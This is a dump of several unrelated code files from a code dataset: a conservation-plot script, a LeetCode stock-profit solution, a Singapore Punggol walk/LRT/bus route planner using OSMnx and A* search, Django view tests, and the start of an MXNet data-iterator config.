subprocess.call(['Rscript',fileName+'.R'])\n\n# ------------------------------------\n# Main function\n# ------------------------------------\ndef main():\n usage = \"usage: %prog <-d path> [options] ...\"\n description = \"Draw conservation plot for many bed files.\"\n\n optparser = OptionParser(version=\"%prog 0.1\",description=description,usage=usage,add_help_option=False)\n optparser.add_option('-H','--height', dest='height',type='int',default=10, help=\"height of plot\")\n optparser.add_option('-W','--width',dest='width',type='int',default=10, help=\"width of plot\")\n optparser.add_option('-w',dest='w',type='int',default=1000, help=\"window width centered at middle of bed regions,default: 1000\")\n optparser.add_option('-t','--title',dest='title',help=\"title of the figure. Default: 'Average Phastcons around the Center of Sites'\",default= 'Average Phastcons around the Center of Sites')\n optparser.add_option('-d','--phasdb',dest='phasdb',help= 'The directory to store phastcons scores in the server')\n optparser.add_option('-o','--outimg',dest='outimg',help= 'output image file prefix')\n optparser.add_option(\"-l\",\"--bed-label\",dest=\"bedlabel\",type=\"string\",action=\"append\",\n help=\"the BED file labels in the figure. No space is allowed. This option should be used same times as -w option, and please input them in the same order as BED files. default: will use the BED file filename as labels.\")\n optparser.add_option(\"-h\",\"--help\",action=\"help\",help=\"Show this help message and exit.\")\n\n (options,bedfiles) = optparser.parse_args()\n options.pf_res = options.w / 100 # get 100 points to plot\n options.w = options.pf_res * 100 # trim\n\n bedfiles = list(map(os.path.abspath,bedfiles))\n bedfilenames = list(map(os.path.basename,bedfiles))\n\n bedfilenum = len(bedfiles)\n\n if bedfilenum < 1 or not options.phasdb:\n optparser.print_help()\n sys.exit(1)\n\n if options.bedlabel and len(options.bedlabel) == bedfilenum:\n bedlabel = options.bedlabel\n else: # or use the filename\n bedlabel = [os.path.basename(x) for x in bedfiles]\n\n if options.height < 10:\n error(\"Height can not be lower than 10!\")\n sys.exit(1)\n if options.width < 10:\n error(\"Width can not be smaller than 10!\")\n sys.exit(1)\n\n # check the files\n for f in bedfiles:\n if not os.path.isfile(f):\n error(\"%s is not valid!\" % f)\n sys.exit(1)\n\n # check phastcons db\n if not os.path.isfile(options.phasdb):\n error(\"%s is not valid!\" % options.phasdb)\n sys.exit(1)\n\n if not options.phasdb:\n error(\"%s has no valid phastcons db bw files!\" % options.phasdb)\n sys.exit(1)\n\n info(\"number of bed files: %d\" % bedfilenum)\n\n avgValues = []\n \n # for each bed file\n for f in bedfiles:\n info(\"extract phastcons scores using %s\" % f)\n scores = extract_phastcons(f, options.phasdb, options.w, options.pf_res)\n if not scores:\n #PRESET to 100 0s\n scores = [0]*100\n avgValues.append(scores)\n if options.w == 4000:\n ## 100 points for 4000, 40bp resolution\n print((\"\\t\".join([str(avgValues[0][i]) for i in [12,25,38,50,62,75,88]])))\n elif options.w == 400:\n print((\"\\t\".join([str(avgValues[0][i]) for i in [45,48,50,52,55]])))\n olddir = os.path.dirname(options.outimg)\n makeBmpFile(avgValues,olddir, options.outimg ,options.height,options.width,options.w,options.pf_res,options.title,bedlabel)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n sys.stderr.write(\"User interrupt me! ;-) See you!\\n\")\n sys.exit(0)","sub_path":"modules/scripts/conservation_onebw_plot.py","file_name":"conservation_onebw_plot.py","file_ext":"py","file_size_in_byte":15322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"291096565","text":"# Say you have an array for which the ith element is the price of a given stock on day i.\n# If you were only permitted to complete at most one transaction (i.e., buy one and sell one share of the stock), design an algorithm to find the maximum profit.\n# Note that you cannot sell a stock before you buy one.\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) == 0:\n return 0\n \n max_profit = 0\n cur_min = prices[0]\n \n for i in range(1, len(prices)):\n if cur_min < prices[i]:\n max_profit = max(max_profit, prices[i] - cur_min)\n else:\n cur_min = prices[i]\n \n return max_profit\n","sub_path":"121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254027398","text":"from flask import Flask, render_template\nimport heapq\nimport folium\nimport math\nimport networkx as nx\nimport time\nfrom datetime import datetime\nimport osmnx as ox\nfrom osmnx import settings\nfrom osmnx.utils import make_str, log\nfrom osmnx.geo_utils import get_largest_component\nfrom osmnx.downloader import overpass_request\nfrom osmnx.errors import *\nimport overpy\nimport codes.findShortestBusRoute as findShortestBusRoute\nimport codes.PlotShortestBusRouteHelperBus as plotShortestBusRoute\n\ndef get_node(element):\n \"\"\"\n Convert an OSM node element into the format for a networkx node.\n\n Parameters\n ----------\n element : dict\n an OSM node element\n\n Returns\n -------\n dict\n \"\"\"\n useful_tags_node = ['ref', 'railway']\n node = {}\n node['y'] = element['lat']\n node['x'] = element['lon']\n node['osmid'] = element['id']\n\n if 'tags' in element:\n for useful_tag in useful_tags_node:\n if useful_tag in element['tags']:\n node[useful_tag] = element['tags'][useful_tag]\n return node\n\n\ndef parse_osm_nodes_paths(osm_data):\n \"\"\"\n Construct dicts of nodes and paths with key=osmid and value=dict of\n attributes.\n Parameters\n ----------\n osm_data : dict\n JSON response from from the Overpass API\n Returns\n -------\n nodes, paths : tuple\n \"\"\"\n\n nodes = {}\n paths = {}\n for element in osm_data['elements']:\n if element['type'] == 'node':\n key = element['id']\n nodes[key] = get_node(element)\n elif element['type'] == 'way': # osm calls network paths 'ways'\n key = element['id']\n paths[key] = ox.get_path(element)\n\n return nodes, paths\n\n\ndef create_graph(mrt_response_json, name='unnamed', retain_all=True, bidirectional=False):\n \"\"\"\n Create a networkx graph from Overpass API HTTP response objects.\n\n Parameters\n ----------\n response_jsons : list\n list of dicts of JSON responses from from the Overpass API\n name : string\n the name of the graph\n retain_all : bool\n if True, return the entire graph even if it is not connected\n bidirectional : bool\n if True, create bidirectional edges for one-way streets\n\n Returns\n -------\n networkx multidigraph\n \"\"\"\n\n log('Creating networkx graph from downloaded OSM data...')\n start_time = time.time()\n\n # make sure we got data back from the server requests\n elements = []\n # for response_json in response_jsons:\n elements.extend(mrt_response_json['elements'])\n if len(elements) < 1:\n raise EmptyOverpassResponse('There are no data elements in the response JSON objects')\n\n # create the graph as a MultiDiGraph and set the original CRS to default_crs\n G = nx.MultiDiGraph(name=name, crs=settings.default_crs)\n\n # extract nodes and paths from the downloaded osm data\n nodes = {}\n paths = {}\n # for osm_data in response_jsons:\n nodes_temp, paths_temp = parse_osm_nodes_paths(mrt_response_json)\n for key, value in nodes_temp.items():\n nodes[key] = value\n for key, value in paths_temp.items():\n paths[key] = value\n\n # add each osm node to the graph\n for node, data in nodes.items():\n G.add_node(node, **data)\n\n # add each osm way (aka, path) to the graph\n G = ox.add_paths(G, paths, bidirectional=bidirectional)\n\n # retain only the largest connected component, if caller did not\n # set retain_all=True\n if not retain_all:\n G = get_largest_component(G)\n\n log('Created graph with {:,} nodes and {:,} edges in {:,.2f} seconds'.format(len(list(G.nodes())),\n len(list(G.edges())),\n time.time() - start_time))\n\n # add length (great circle distance between nodes) attribute to each edge to\n # use as weight\n if len(G.edges) > 0:\n G = ox.add_edge_lengths(G)\n\n return G\n\n# LRT fare based on distance travelled\ndef lrtFareCal(distance):\n if distance <= 3.2:\n print(\"Student Fare: $0.42\")\n print(\"Adult Fare: $0.92\")\n print(\"Senior Citizen Fare: $0.59\")\n elif 4.2 >= distance > 3.2:\n print(\"Student Fare: $0.47\")\n print(\"Adult Fare: $1.02\")\n print(\"Senior Citizen Fare: $0.66\")\n elif 5.2 >= distance > 4.2:\n print(\"Student Fare: $0.52\")\n print(\"Adult Fare: $1.12\")\n print(\"Senior Citizen Fare: $0.73\")\n elif 6.2 >= distance > 5.2:\n print(\"Student Fare: $0.47\")\n print(\"Adult Fare: $1.22\")\n print(\"Senior Citizen Fare: $0.80\")\n\n\n# finding which mrt station is closest to the start/end point\ndef lrt_nearnode(srctomrt):\n nearnode = []\n for k in mrtNodeList:\n if k.get(\"railway\") == \"station\" or k.get(\"railway\") == \"stop\":\n h = heuristic(mrtn_latlon(srctomrt), mrtn_latlon(k.get(\"osmid\")))\n heapq.heappush(nearnode, (h, k.get(\"osmid\")))\n return heapq.heappop(nearnode)\n\n\n# retrieving lat/lon coordinates for LRT via OSMID\ndef mrtn_latlon(osmid):\n for k in mrtNodeList:\n if k.get(\"osmid\") == osmid:\n return k.get(\"y\"), k.get(\"x\")\n\n\n# retrieving lat/lon coordinates for walk via OSMID\ndef walk_latlon(osmid):\n for k in walkNodeList:\n if k.get(\"osmid\") == osmid:\n return k.get(\"x\"), k.get(\"y\")\n\n\n# calculating heuristic between two lat/lon points\ndef heuristic(start, end):\n lat1, lon1 = start[0], start[1]\n lat2, lon2 = end[0], end[1]\n radius = 6371 # km\n\n distlat = math.radians(lat2 - lat1)\n distlon = math.radians(lon2 - lon1)\n a = math.sin(distlat / 2) * math.sin(distlat / 2) + math.cos(math.radians(lat1)) \\\n * math.cos(math.radians(lat2)) * math.sin(distlon / 2) * math.sin(distlon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n dist = radius * c * 1000\n\n return dist\n\n\n# ASTAR ALGORITHM\ndef lrt_astar(start_point, end_point, use):\n closepath = {}\n path = []\n routeq = []\n finalret = []\n stat = []\n strt = 0\n\n # finding start station (working)\n if use == \"no\":\n for k in mrtEdgeList:\n h = heuristic(mrtn_latlon(start_point), mrtn_latlon(k[0][1]))\n if h > 30:\n heapq.heappush(stat, (h, k[0][1]))\n strt = heapq.heappop(stat)[1]\n elif use == \"yes\":\n strt = start_point\n\n # pushing start point into heapq queue (heuristic, length(dist), parent(key), current(value))\n heapq.heappush(routeq, (0, 0, None, strt))\n closepath[strt] = None\n\n while True:\n temp = heapq.heappop(routeq)\n\n # check if we reach end point node\n if heuristic(mrtn_latlon(temp[3]), mrtn_latlon(end_point)) < 60:\n path.append(temp[3])\n rear = temp[2]\n\n # path list to append all osmid by key in closepath with the first being the end node\n while rear is not None:\n path.append(rear)\n rear = closepath.get(rear)\n\n # reverse the path list into start to end\n path = path[::-1]\n finalret.append(path)\n finalret.append(temp[1])\n return finalret\n else:\n for i in mrtEdgeList:\n if i[0][0] == temp[3]:\n if i[0][1] in closepath:\n continue\n else:\n he = heuristic(mrtn_latlon(i[0][1]), mrtn_latlon(end_point))\n cur_length = i[1].get('length')\n heapq.heappush(routeq,\n ((he + temp[1] + cur_length), cur_length + temp[1], temp[3], i[0][1]))\n # adding previous path to close path dict to prevent an infinite loop of short path\n closepath[i[0][1]] = temp[3]\n\n\n# ASTAR ALGORITHM\ndef walk_astar(start_point, end_point):\n closepath = {}\n path = []\n routeq = []\n finalret = []\n\n # pushing start point into heapq queue (heuristic, length(dist), parent(key), current(value))\n heapq.heappush(routeq, (0, 0, None, start_point))\n closepath[start_point] = None\n\n while True:\n temp = heapq.heappop(routeq)\n # check if we reach end point node\n if temp[3] == end_point:\n path.append(temp[3])\n rear = temp[2]\n\n # path list to append all osmid by key in closepath with the first being the end node\n while rear is not None:\n path.append(rear)\n rear = closepath.get(rear)\n\n # reverse the path list into start to end\n path = path[::-1]\n finalret.append(path)\n finalret.append(temp[1])\n return finalret\n else:\n for i in walkEdgeList:\n if i[0][0] == temp[3]:\n if i[0][1] in closepath:\n continue\n else:\n h = heuristic(walk_latlon(i[0][1]), walk_latlon(end_point))\n cur_length = i[1].get('length')\n heapq.heappush(routeq, (h + cur_length + temp[1], cur_length + temp[1], temp[3], i[0][1]))\n # adding previous path to close path dict to prevent an infinite loop of short path\n closepath[i[0][1]] = temp[3]\n\n\n# conversion of route to coords\ndef convertRoute(coords):\n output = []\n for x in range(len(coords)): # Parent Array\n for i in range(len(coords[x])): # Inner Array\n output.append([coords[x][i][1], coords[x][i][0]])\n return output\n\n\n# main code\npunggol = (1.403948, 103.909048)\ndistance = 2000\n\n# data creation and storing\nmrt_query_str = '[out:json][timeout:180];(relation[\"network\"=\"Singapore Rail\"][\"route\"=\"monorail\"](1.4011,103.8977,1.4154,103.9231);>;);out;'\nmrt_response_json = overpass_request(data={'data': mrt_query_str}, timeout=180)\nG_lrt = create_graph(mrt_response_json)\nG_walk = ox.graph_from_point(punggol, distance=distance, truncate_by_edge=True, network_type='walk')\nG_bus = ox.graph_from_point(punggol, distance=distance, network_type='drive_service')\n\napi = overpy.Overpass()\n\n# storing all nodes into a list\nwalkNodeList = list(G_walk.nodes.values())\nwalkEdgeList = list(G_walk.edges.items())\nmrtNodeList = list(G_lrt.nodes.values())\nmrtEdgeList = list(G_lrt.edges.items())\n\npe = []\npw = []\nfor k in mrtNodeList: # check for nodes which are stations\n try:\n if \"PE\" in k.get('ref'):\n pe.append(k.get('osmid'))\n if \"PW\" in k.get('ref'):\n pw.append(k.get('osmid'))\n except: # to catch and skip noneType iterations\n continue\n\n# testing algorithmn speed\nstart_time = time.time()\n# user input (GUI TEAM, user input in text area will be stored here)\nsrc = \"Block 130, Edgedale Plains, Punggol\" # 406B, Northshore Drive, Punggol - Nibong, Punggol\n# punggol will return punggol mrt coordinates 406B, Northshore Drive, Punggol - 220A Sumang Lane, Singapore 821220 - Blk 126A, Punggol Field, Punggol - Waterway Cascadia, 314A, Punggol Way, Punggol\ndes = \"406B, Northshore Drive, Punggol\" # random hdb 60 Punggol East, Singapore 828825\nstartpoint = ox.geocode(src)\nendpoint = ox.geocode(des)\n\n# finding nearest nodes required\nstrtpt = ox.get_nearest_node(G_walk, startpoint, method='euclidean', return_dist=True)\nendpt = ox.get_nearest_node(G_walk, endpoint, method='euclidean', return_dist=True)\n\n# locateStrtLrt and lcoateEndLrt is only used to locate the location of both mrt\nlocateStrtLrt = ox.get_nearest_node(G_lrt, startpoint, method='euclidean', return_dist=True)\nlcoateEndLrt = ox.get_nearest_node(G_lrt, endpoint, method='euclidean', return_dist=True)\nlrtstart = lrt_nearnode(locateStrtLrt[0])[1]\nlrtend = lrt_nearnode(lcoateEndLrt[0])[1]\n\nif (lrtstart == lrtend or (lrtstart == 6587709456 and lrtend == 6587709457) or (lrtstart == 6587709457 and\n lrtend == 6587709456)): # and (start point bus stop node is same as end point):\n final = walk_astar(strtpt[0], endpt[0])\n\n # plotting map to folium\n m = ox.plot_route_folium(G_walk, final[0], route_color='blue', route_width=5, tiles=\"OpenStreetMap\",\n popup_attribute=\"There is no LRT to bring you to your destination, please walk.\")\n m.save('templates/astaralgo_walklrtbus.html')\nelse:\n reachLRT = ox.get_nearest_node(G_walk, mrtn_latlon(lrtstart), method='euclidean', return_dist=True)\n leaveLRT = ox.get_nearest_node(G_walk, mrtn_latlon(lrtend), method='euclidean', return_dist=True)\n\n eastlrt = 0\n westlrt = 0\n for i in mrtNodeList:\n mrtid = i.get('osmid')\n if mrtid == lrtstart and lrtstart in pe:\n eastlrt += 1\n # print(\"scenario1\")\n elif mrtid == lrtstart and lrtstart in pw:\n # print(\"scenario2\")\n westlrt += 1\n elif mrtid == lrtend and lrtend in pe:\n # print(\"scenario3\")\n eastlrt += 1\n elif mrtid == lrtend and lrtend in pw:\n # print(\"scenario4\")\n westlrt += 1\n elif westlrt == 2 or eastlrt == 2: # both lrt station in the same lrt loop\n break\n elif westlrt == 1 and eastlrt == 1: # both lrt station in different lrt loop\n # print(\"break\")\n break\n\n m = folium.Map(location=punggol, distance=distance, zoom_start=15)\n\n if westlrt == 1 and eastlrt == 1: # if both stations are found on both loop (west loop and east loop)\n if lrtstart in pw:\n lrtfirst = lrt_astar(lrt_nearnode(lrtstart)[1], 6587709456, \"no\")\n lrtsecond = lrt_astar(6587709457, lrt_nearnode(lrtend)[1], \"yes\")\n elif lrtstart in pe:\n lrtfirst = lrt_astar(lrt_nearnode(lrtstart)[1], 6587709457, \"no\")\n lrtsecond = lrt_astar(6587709456, lrt_nearnode(lrtend)[1], \"yes\")\n\n radius = 100\n endBusStopNode = None\n endLRTBusStopNode = None\n\n while endBusStopNode is None:\n endBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endpoint[0]) + \",\" + str(endpoint[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endBusStopNode.nodes) > 0:\n endBusStopNode = endBusStopNode.nodes[0]\n endBusStopLatLon = (endBusStopNode.lat, endBusStopNode.lon)\n endBusStopCode = endBusStopNode.tags['asset_ref']\n else:\n endBusStopNode = None\n radius += 50\n\n endLRTLatLon = mrtn_latlon(lcoateEndLrt[0])\n\n while endLRTBusStopNode is None:\n endLRTBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endLRTLatLon[0]) + \",\" + str(endLRTLatLon[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endLRTBusStopNode.nodes) > 0:\n endLRTBusStopNode = endLRTBusStopNode.nodes[0]\n endLRTBusStopLatLon = (endLRTBusStopNode.lat, endLRTBusStopNode.lon)\n endLRTBusStopCode = endLRTBusStopNode.tags['asset_ref']\n else:\n endLRTBusStopNode = None\n radius += 50\n\n if endBusStopNode.id == endLRTBusStopNode.id:\n # algo testing walk and lrt\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n walkFromStation = walk_astar(leaveLRT[0], endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromStation[0]))\n lrtfirst[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfirst[0]))\n lrtsecond[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtsecond[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfirst[1] + lrtsecond[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + ((totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromStation[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: 1, Punggol Station\")\n\n # plotting on folium map\n folium.PolyLine(lrtfirst[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Change LRT at Punggol Station.\").add_to(m)\n folium.PolyLine(lrtsecond[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Continue here to your destination.\").add_to(m)\n folium.PolyLine(([lrtfirst[0][-1]] + [lrtsecond[0][0]]), color=\"blue\", weight=2, opacity=1,\n tooltip=\"Transit LRT here!\").add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfirst[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([lrtsecond[0][-1]] + walkFromStation[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n else:\n # algo testing walk and lrt\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n\n paths = findShortestBusRoute.findShortestBusRoute(int(endLRTBusStopCode), int(endBusStopCode))\n bus = plotShortestBusRoute.findPath(paths)\n\n walkFromBusStop = walk_astar(endLRTBusStopNode.id, endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromBusStop[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromBusStop[0]))\n bus[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_bus, bus[0]))\n lrtfirst[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfirst[0]))\n lrtsecond[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtsecond[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfirst[1] + lrtsecond[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + (\n (totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromBusStop[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: 1, Punggol Station\")\n\n # plotting on folium map\n folium.PolyLine(lrtfirst[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Change LRT at Punggol Station.\").add_to(m)\n folium.PolyLine(lrtsecond[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Continue here to your destination.\").add_to(m)\n folium.PolyLine(bus[0], color=\"green\", weight=2, opacity=1,\n tooltip=\"Change from Lrt to Bus.\").add_to(m)\n folium.PolyLine(([lrtfirst[0][-1]] + [lrtsecond[0][0]]), color=\"blue\", weight=2, opacity=1,\n tooltip=\"Transit LRT here!\").add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfirst[0][0]]), color=\"blue\", weight=2, opacity=1,\n tooltip=\"Walk to Bus stop\").add_to(m)\n folium.PolyLine(([lrtsecond[0][-1]] + [bus[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([bus[0][-1]] + walkFromBusStop[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n\n else: # if both stations are found on the same lrt loop\n # algo testing walk and lrt\n lrtfinal = lrt_astar(lrt_nearnode(lrtstart)[1], lrt_nearnode(lrtend)[1], \"no\")\n\n radius = 100\n endBusStopNode = None\n endLRTBusStopNode = None\n\n while endBusStopNode is None:\n endBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endpoint[0]) + \",\" + str(endpoint[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endBusStopNode.nodes) > 0:\n endBusStopNode = endBusStopNode.nodes[0]\n endBusStopLatLon = (endBusStopNode.lat, endBusStopNode.lon)\n endBusStopCode = endBusStopNode.tags['asset_ref']\n else:\n endBusStopNode = None\n radius += 50\n\n endLRTLatLon = mrtn_latlon(lcoateEndLrt[0])\n\n radius = 100\n while endLRTBusStopNode is None:\n endLRTBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endLRTLatLon[0]) + \",\" + str(endLRTLatLon[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endLRTBusStopNode.nodes) > 0:\n endLRTBusStopNode = endLRTBusStopNode.nodes[0]\n endLRTBusStopLatLon = (endLRTBusStopNode.lat, endLRTBusStopNode.lon)\n endLRTBusStopCode = endLRTBusStopNode.tags['asset_ref']\n else:\n endLRTBusStopNode = None\n radius += 50\n\n if endBusStopNode.id == endLRTBusStopNode.id:\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n walkFromStation = walk_astar(leaveLRT[0], endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromStation[0]))\n lrtfinal[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfinal[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfinal[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + (\n (totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromStation[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: None.\")\n\n # plotting map to folium\n folium.PolyLine(lrtfinal[0], color=\"red\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfinal[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([lrtfinal[0][-1]] + walkFromStation[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n else:\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n\n paths = findShortestBusRoute.findShortestBusRoute(int(endLRTBusStopCode), int(endBusStopCode))\n bus = plotShortestBusRoute.findPath(paths)\n\n walkFromBusStop = walk_astar(endBusStopNode.id, endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromBusStop[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromBusStop[0]))\n bus[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_bus, bus[0]))\n lrtfinal[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfinal[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfinal[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + (\n (totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromBusStop[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: None.\")\n\n # plotting map to folium\n folium.PolyLine(lrtfinal[0], color=\"red\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(bus[0], color=\"green\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfinal[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([lrtfinal[0][-1]] + [bus[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([bus[0][-1]] + walkFromBusStop[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n\nprint(\"--- %s seconds to run all calculations ---\" % round((time.time() - start_time), 2))","sub_path":"development_codes(scripts_unused_in_application)/walk_lrt_bus_algo(finalised).py","file_name":"walk_lrt_bus_algo(finalised).py","file_ext":"py","file_size_in_byte":27428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"641302962","text":"import json\nimport unittest\n\nfrom django.test import Client\nfrom django.urls import reverse\n\nimport example_app.views\n\n\nclass ExampleTestCase(unittest.TestCase):\n\n def test_query_json(self):\n response = Client().get(reverse(example_app.views.words),\n {'query': u'er'},\n HTTP_ACCEPT='application/json')\n data = json.loads(response.content.decode('utf-8'))\n self.assertEqual(data['matches'],\n ['intermediary', 'otherwise', 'shatters'])\n\n def test_query_plain(self):\n response = Client().get(reverse(example_app.views.words),\n {'query': u'er'})\n self.assertEqual(response.content,\n b'intermediary\\notherwise\\nshatters\\n')\n\n def test_add_word(self):\n Client().post(reverse(example_app.views.words),\n data='foo bar baz', content_type='text/plain')\n self.assertTrue(u'bar' in example_app.views.all_words)\n\n def test_all_words(self):\n response = Client().get(reverse(example_app.views.words))\n self.assertTrue(response.streaming)\n","sub_path":"example/example_app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"480038361","text":"import mxm.release.googlenet.main.config as cfg\nimport mxnet as mx\n\n\ndef get_rec_iter(kv=None):\n if kv:\n (rank, nworker) = (kv.rank, kv.num_workers)\n else:\n (rank, nworker) = (0, 1)\n train = mx.io.ImageRecordIter(\n path_imgrec = cfg.data_train,\n label_width = 1,\n # mean_r = cfg.rgb_mean[0],\n # mean_g = cfg.rgb_mean[1],\n # mean_b = cfg.rgb_mean[2],\n scale=1.0 / 255,\n data_name = 'data',\n label_name = 